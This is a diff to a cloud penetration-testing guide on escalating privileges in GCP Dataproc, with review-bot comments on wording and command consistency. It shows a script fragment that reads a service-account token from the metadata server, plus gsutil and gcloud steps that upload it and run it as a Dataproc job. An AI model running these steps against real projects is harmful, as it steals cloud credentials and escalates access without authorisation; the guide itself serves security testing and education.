diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md index 8dee9c50c..fa004ef8c 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md @@ -12,10 +12,16 @@ roles/dataproc.admin - Full control over Dataproc clusters, including creating, These permissions make both roles highly sensitive and dangerous if misused. +## dataproc.jobs.create & dataproc.clusters.use + +The following method - projects.regions.jobs.submit enables a SA to create a dataproc job, which can be abused as shown in the example below. it must be noted that in order to exploit these permissions SA should also have the necessary privileges to move the malicious script to the storage bucket (storage.objects.create). + +the following permissions were assigned to the SA for the PoC (dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get, storage.objects.list) + ## Privilege Escalation via Metadata Token Leaking -By abusing the permissions granted by roles/dataproc.editor or roles/dataproc.admin, an attacker can: + - Submit a job to a Dataproc cluster. @@ -29,7 +35,7 @@ The following script demonstrates how an attacker can submit a job to a Dataproc import requests -# Metadata server URL to fetch the access token +## Metadata server URL to fetch the access token ``` metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token" 
@@ -53,6 +59,9 @@ if __name__ == "__main__": ### Steps to exploit ``` +# Copy the script to the storage bucket +gsutil cp fetch-metadata-token.py gs://dataproc-poc-bucket-hacktest/fetch-metadata-token.py +# Submit the malicious job gcloud dataproc jobs submit pyspark gs:///fetch_metadata_token.py \ --cluster= \ --region=
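Review bot: In hunk `@@ -12,10 +12,16 @@`, replacing `-By abusing the permissions granted by roles/dataproc.editor or roles/dataproc.admin, an attacker can:` with an empty line leaves the bullet list that follows (`- Submit a job to a Dataproc cluster.`) with no introductory sentence under "## Privilege Escalation via Metadata Token Leaking"; keep that sentence, or reword it to cover the new `dataproc.jobs.create`/`dataproc.clusters.use` case, rather than deleting it. The change from `-# Metadata server URL to fetch the access token` to `+## Metadata server URL to fetch the access token` sits between `import requests` and `metadata_url = ...`, i.e. inside the Python script, where a doubled `#` is just an odd-looking comment and not a Markdown heading, so it should go back to a single `#`. In the new `## dataproc.jobs.create & dataproc.clusters.use` section, the sentences beginning `it must be noted` and `the following permissions were assigned` need a capital first letter, and "the example below" should name the section it points to, since the PoC steps live under a different heading.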
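Review bot: In hunk `@@ -53,6 +59,9 @@`, the added `gsutil cp fetch-metadata-token.py gs://dataproc-poc-bucket-hacktest/fetch-metadata-token.py` uploads a hyphenated file name to a concrete bucket, while the next line submits `gs:///fetch_metadata_token.py` (underscores, empty bucket), so the two steps do not chain: the submit would not reference the object just copied. Use one spelling of the script name in both lines and the same placeholder style already used by `--cluster=` and `--region=` (for example `gs://<bucket>/fetch-metadata-token.py` in both) instead of a PoC-specific bucket name.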